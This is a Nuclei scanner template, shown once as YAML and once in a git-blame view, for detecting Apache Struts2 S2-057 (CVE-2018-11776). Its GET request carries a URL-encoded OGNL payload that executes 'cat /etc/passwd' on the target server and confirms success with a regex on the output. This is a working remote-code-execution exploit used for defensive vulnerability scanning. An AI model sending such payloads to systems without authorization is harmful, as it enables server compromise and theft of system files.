nuclei-templates/http/cves/2018/CVE-2018-11776.yaml

id: CVE-2018-11776

info:
  name: Apache Struts2 S2-057 - Remote Code Execution
  author: pikpikcu
  severity: high
  description: |
    Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.
  reference:
    - https://github.com/jas502n/St2-057
    - https://cwiki.apache.org/confluence/display/WW/S2-057
    - https://security.netapp.com/advisory/ntap-20180822-0001/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11776
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2018-11776
    cwe-id: CWE-20
  tags: cve,cve2018,apache,rce,struts,kev
  metadata:
    max-request: 1

http:
  - method: GET
    path:
      - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
Create CVE-2018-11776.yaml 2021-02-24 04:29:30 +00:00			`id: CVE-2018-11776`

			`info:`
Enhancement: cves/2018/CVE-2018-11776.yaml by mp 2022-06-19 15:52:10 +00:00			`name: Apache Struts2 S2-057 - Remote Code Execution`
Create CVE-2018-11776.yaml 2021-02-24 04:29:30 +00:00			`author: pikpikcu`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: high`
Update CVE-2018-11776.yaml 2022-06-20 16:15:21 +00:00			`description: \|`
			`Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://github.com/jas502n/St2-057`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://cwiki.apache.org/confluence/display/WW/S2-057`
			`- https://security.netapp.com/advisory/ntap-20180822-0001/`
Enhancement: cves/2018/CVE-2018-11776.yaml by mp 2022-06-19 15:52:10 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2018-11776`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 8.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2018-11776`
			`cwe-id: CWE-20`
Updated "cisa" tags to "kev" + added tags to new applicable templates (#4871) 2022-07-21 17:18:22 +00:00			`tags: cve,cve2018,apache,rce,struts,kev`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
Create CVE-2018-11776.yaml 2021-02-24 04:29:30 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2018-11776.yaml 2021-02-24 04:29:30 +00:00			`- method: GET`
			`path:`
			- "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"

			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
Updated "/etc/passwd" regex to avoid possible false positive results. 2022-03-22 08:01:31 +00:00			`- "root:.*:0:0:"`
fixed trailing spaces 2021-03-05 20:44:21 +00:00
Create CVE-2018-11776.yaml 2021-02-24 04:29:30 +00:00			`- type: status`
			`status:`
			`- 200`